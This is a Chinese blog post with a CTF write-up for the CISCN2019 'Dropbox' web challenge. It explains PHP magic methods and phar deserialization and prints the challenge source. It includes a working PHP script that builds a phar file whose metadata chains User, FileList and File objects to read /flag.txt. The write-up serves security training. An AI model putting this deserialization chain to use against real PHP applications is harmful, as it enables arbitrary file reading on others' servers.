NO.3-5 [CISCN2019 华北赛区 Day1 Web1]Dropbox

最新推荐文章于 2023-06-05 14:32:49 发布
最新推荐文章于 2023-06-05 14:32:49 发布
阅读量300 收藏
点赞数
分类专栏: BUUCTF 杂项/审计
原文链接:https://blog.csdn.net/weixin_44077544/article/details/102844554
版权

知识点轰炸

1.1 open_basedir

在in_set这个函数中,可以设置php的一些配置,其中就包括open_basedir ,用来限制当前程序可以访问的目录。后来问了一下朱师傅,了解到:它是可以访问设置目录下的所有下级目录。
若"open_basedir = /dir/user", 那么目录 “/dir/user” 和 “/dir/other"都是可以访问的。所以如果要将访问限制在仅为指定的目录,请用斜线结束路径名。”."可代表当前目录,open_basedir也可以同时设置多个目录,在Windows中用分号分隔目录,在任何其它系统中用冒号分隔目录。例:
ini_set(“open_basedir”, getcwd() . “:/etc:/tmp”); 就是只可以访问当前目录(getcwd()返回当前目录)、/etc和/tmp三个目录。解释了为什么要在delete.php中利用payload,而不是download.php。

1.2 chdir() mkdir()

  •     chdir() 现实目录跳跃,解释了为什么下载时要filename = ../../indx.php ,而不是filename = index.php。
  •     mkdir() 创建一个文件夹,顺带提一下。

1.3 function __call($func, $args)

php的魔术方法,为什么要叫魔术方法?__call($func,$args)会在对象调用的方法不存在时,自动执行。 $func:被调用的方法名,所以$func()在这个魔术方法中,可以表示被调用的那个方法; $args : 被调用方法中的参数(这是个数组)

public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }

在本题中,次方法的作用,是去调用对象没有的方法。首先把要调用的方法,压进$this->funcs中,然后遍历每一个文件,让每一个文件,都去调用刚才的方法。比如在index.php中,就出现了这个函数的调用。


当执行 $a = new FileList($_SESSION[‘sandbox’])时,会先调用构造函数,把“$_SESSION[‘sandbox’]”目录下的所有文件,都放到 $a->files中,注意这是个数组,解释了为什么,在后面构造payload时,\$this->files要等于一个数组。然后 $a->Name(); 调用了一个FileList中并没有的方法,就会自动调用 __all($func, $args)函数,其中$func=Name。然后让
$a->files里的所有文件,都去调用这个方法。并把结果,存储在以filename为一级键名,方法为二级键名的数组中。然后Size方法同样如此。
 

nameSize
filename1xxxx
filename2xxxx

也就时说,它在程序中的作用就是,遍历我们上传的所有文件,并把它们的信息,储存在\$a->result这个二维数组中。

1.4 function __destruct() 

foreach ($this->results as $filename => $result) {
            $table .= '<tr>';
            foreach ($result as $func => $value) {
                $table .= '<td class="text-center">' . htmlentities($value) . '</td>';
            }
            $table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">涓嬭浇</a> / <a href="#" class="delete">鍒犻櫎</a></td>';
            $table .= '</tr>';
        }

 

  • foreach ($this->results as $filename => $result) 每次把每个一级数组的值,传递给$result,即filename1[]
  • foreach ($result as $func => $value) 每次把每个二级数组的值,传递给$value
  • echo table 最后打印出来全部数据

解决了读取的数据,无法输出的问题

1.5 phar(重点)

讲phar的链接
我的理解,我们可以把一个序列化的对象,储存在phar格式的文件中,生成后(一定要是生成后),即使我们把格式给改了,也不影响它的作用:用一些文件包含函数,如果我们以phar://协议去访问这个文件,那么就可以把那个对象给反序列化。
php一大部分的文件系统函数在通过phar://伪协议解析phar文件时,都会将meta-data进行反序列化,别人测试后,受影响的函数如下:



2 实践

在File类中,close方法存在file_get_contents()函数,在User中,会调用改方法$this->db->close(),如果有回显的化,我们就可以直接构造payload:

<?php
class User {
	public $db;
}
class File {
	public $filename = "/flag.txt";
}
$a = new User();
$a->db = new File();
?>

 然后放到phar文件后,就可以了。
但事实并没有回显,那么我们就让$this->db = new FileList(),让它去调用close,然后调用__call(),然后再调用 __destruct()函数,打印结果。完美,可是我想不到
payload:

<?php
class User {
    public $db;
}
class File {
    public $filename;
}
class FileList {
    private $files;
    public function __construct() {
        $file = new File();
        $file->filename = "/flag.txt";
        $this->files = array($file);
    }
}

$a = new User();
$a->db = new FileList();

$phar = new Phar("phar.phar"); //后缀名必须为phar

$phar->startBuffering();

$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub

$o = new User();
$o->db = new FileList();

$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("exp.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>

3.总结

感觉只要和序列化有关的,就在魔术方法里,找高危函数就完事了,有file_get_contents()的,就是任意文件读取,有eval的,就是任意命令执行。

详细分析:

https://www.jianshu.com/p/5b91e0b7f3ac

主要源码:

download.php

<?php
session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}

if (!isset($_POST['filename'])) {
    die();
}

include "class.php";
ini_set("open_basedir", getcwd() . ":/etc:/tmp");

chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename) && stristr($filename, "flag") === false) {
    Header("Content-type: application/octet-stream");
    Header("Content-Disposition: attachment; filename=" . basename($filename));
    echo $file->close();
} else {
    echo "File not exist";
}
?>

class.php

<?php
error_reporting(0);
$dbaddr = "127.0.0.1";
$dbuser = "root";
$dbpass = "root";
$dbname = "dropbox";
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);

class User {
    public $db;

    public function __construct() {
        global $db;
        $this->db = $db;
    }

    public function user_exist($username) {
        $stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->store_result();
        $count = $stmt->num_rows;
        if ($count === 0) {
            return false;
        }
        return true;
    }

    public function add_user($username, $password) {
        if ($this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
        $stmt->bind_param("ss", $username, $password);
        $stmt->execute();
        return true;
    }

    public function verify_user($username, $password) {
        if (!$this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->bind_result($expect);
        $stmt->fetch();
        if (isset($expect) && $expect === $password) {
            return true;
        }
        return false;
    }

    public function __destruct() {
        $this->db->close();
    }
}

class FileList {
    private $files;
    private $results;
    private $funcs;

    public function __construct($path) {
        $this->files = array();
        $this->results = array();
        $this->funcs = array();
        $filenames = scandir($path);

        $key = array_search(".", $filenames);
        unset($filenames[$key]);
        $key = array_search("..", $filenames);
        unset($filenames[$key]);

        foreach ($filenames as $filename) {
            $file = new File();
            $file->open($path . $filename);
            array_push($this->files, $file);
            $this->results[$file->name()] = array();
        }
    }

    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }

    public function __destruct() {
        $table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">';
        $table .= '<thead><tr>';
        foreach ($this->funcs as $func) {
            $table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>';
        }
        $table .= '<th scope="col" class="text-center">Opt</th>';
        $table .= '</thead><tbody>';
        foreach ($this->results as $filename => $result) {
            $table .= '<tr>';
            foreach ($result as $func => $value) {
                $table .= '<td class="text-center">' . htmlentities($value) . '</td>';
            }
            $table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">下载</a> / <a href="#" class="delete">删除</a></td>';
            $table .= '</tr>';
        }
        echo $table;
    }
}

class File {
    public $filename;

    public function open($filename) {
        $this->filename = $filename;
        if (file_exists($filename) && !is_dir($filename)) {
            return true;
        } else {
            return false;
        }
    }

    public function name() {
        return basename($this->filename);
    }

    public function size() {
        $size = filesize($this->filename);
        $units = array(' B', ' KB', ' MB', ' GB', ' TB');
        for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
        return round($size, 2).$units[$i];
    }

    public function detele() {
        unlink($this->filename);
    }

    public function close() {
        return file_get_contents($this->filename);
    }
}
?>

nigo134
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[CISCN2019 华北赛区 Day1 Web1]Dropbox
snowlyzz的博客
09-05 1007
phar + 代码审计
[CISCN2019 华北赛区 Day1 Web1]Dropbox (phar反序列化)
qq_45699846的博客
03-11 2481
[CISCN2019 华北赛区 Day1 Web1]Dropbox (phar反序列化)
CISCN2019_华北赛区_Day1_Web1-Dropbox
抒情诗
10-23 376
好长时间没做web了,web狗太难了 首先得检讨一下,我竟然将近三天没做web题目了,这这这还是一个web狗应该做的吗?反思一下呜呜呜。。。 phar反序列化 什么是phar反序列化呢? 下面的文章可能会有点帮助来自jianshu 按照我的理解来说呢,就是把危险的文件上传到服务器?然后借助某些功能与危险函数实现危险的操作,太笼统了。具体来说呢就是php文件系统中很大一部分的函数在通过phar://解析时,存在着对meta-data(在这里<meta-data>区域面搞反序列化的pop链)反序列化
draw.io-21.6.1-windows-installer
最新发布
07-07
《draw.io-21.6.1-windows-installer:图形绘制工具在Windows平台的应用与实践》 draw.io是一款流行的开源在线绘图工具,专为创建流程图、UML图、网络拓扑图、思维导图等多种图形而设计。其最新版本21.6.1针对...
draw.io-14.6.13-windows-no-installer.zip
08-04
此外,draw.io还集成了Google Drive、Dropbox、OneDrive等云存储服务,方便用户保存和分享作品。 在安全性方面,draw.io遵循了严格的数据隐私政策,用户可以选择在本地或云端保存文件,数据传输过程加密,确保了...
draw.io-20.3.0-windows-installer
10-19
3. **兼容性**:可以与Google Drive、Dropbox等云服务无缝集成,方便存储和共享图表。 4. **开源免费**:draw.io是基于MIT许可证的开源项目,用户可以自由下载、使用,并参与开发改进。 二、draw.io-20.3.0-...
draw.io-13.3.9-windows-installer.rar
08-13
此外,draw.io还具备强大的文件兼容性,可以导入和导出多种格式(如SVG、PNG、PDF、XML),并与Google Drive、Dropbox等云存储服务无缝集成,方便文件的存储和分享。 在协作方面,draw.io提供实时协作功能,允许...
draw.io-13.9.9-windows-installer.rar
04-08
它可以与Google Drive、Dropbox等云服务无缝集成,方便团队成员共享和编辑图表,实现实时协作。同时,它还支持导出为多种格式(如PDF、SVG、PNG等),方便在各种场合展示和打印。 总的来说,draw.io凭借其强大的...
buuctf-web-[CISCN2019 华北赛区 Day1 Web1]Dropbox
weixin_43345082的博客
08-27 3286
在下载的时候可以通过抓包修改文件名filename=…/…/index.php 获得源码 有这样几个页面 重点在class.php和delete.php中 当时提示是phar反序列化 什么是phar反序列化 传送门1 传送门2 在phar://xx.phar文件的时候 可以通过某些函数触发反序列化 delete.php会执行$file->detele(); class.php中的File类...
ciscn2019华北赛区半决赛day1_web1题解
weixin_30776273的博客
08-07 447
感谢buuoj的大佬们搭建的复现环境。作为一位CTF的初学者,我会把每个题目的writeup都写的尽量详细,希望能帮到后面的初学者。 http://web42.buuoj.cn 文章会不定时继续完善,完善内容可能包括分析的错误、语病和文章结构等。 复现过程 进入解题页面发现需要登录,这里只需要注册一个账号然后登录即可。 登录以后是一个网盘的页面,最开始只有上传功能,并且只能上传pn...
[CTFTraining] CISCN 2019 华北赛区 Day1 Web1
ZXW_NUDT的博客
06-05 1822
[CTFTraining] CISCN 2019 华北赛区 Day1 Web1
BUUCTF-WEB-[CISCN2019 华北赛区 Day1 Web2]ikun
weixin_43345082的博客
07-30 8493
当时没做出来,大佬复现了环境就做一波 题目 第一步提示我们要找到lv6 写个脚本找一下 import requests url="http://web44.buuoj.cn/shop?page=" for i in range(0,2000): r=requests.get(url+str(i)) if 'lv6.png' in r.text: print (i) break ...
南邮CTF-WEB(在更)
weixin_43345082的博客
07-07 405
签到题 key在哪里? md5 collision php弱类型比较 0e开头的值全相同 签到题2 提示输入口令,但是发现只能输入10位,修改长度 这题不是WEB 保存图片,winhex打开 层层递进 这题太狗了,这谁能想得到 AAencode 查看源代码可能有乱码,是编码问题,改一下编码 火狐在这里改 其他浏览器啊帖链接 浏览器改编码 直接在控制台里运行 单身二十年 抓包发现中...
[ciscn2019 华北赛区 day1 web1]dropbox
06-06
这是一道Web安全题目,要求我们通过访问网站,获取到flag。 题目中给出了一个网站地址,我们可以直接访问该网站。进入网站后,我们可以看到一个登录界面,要求我们输入用户名和密码。 我们可以尝试一些常见的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值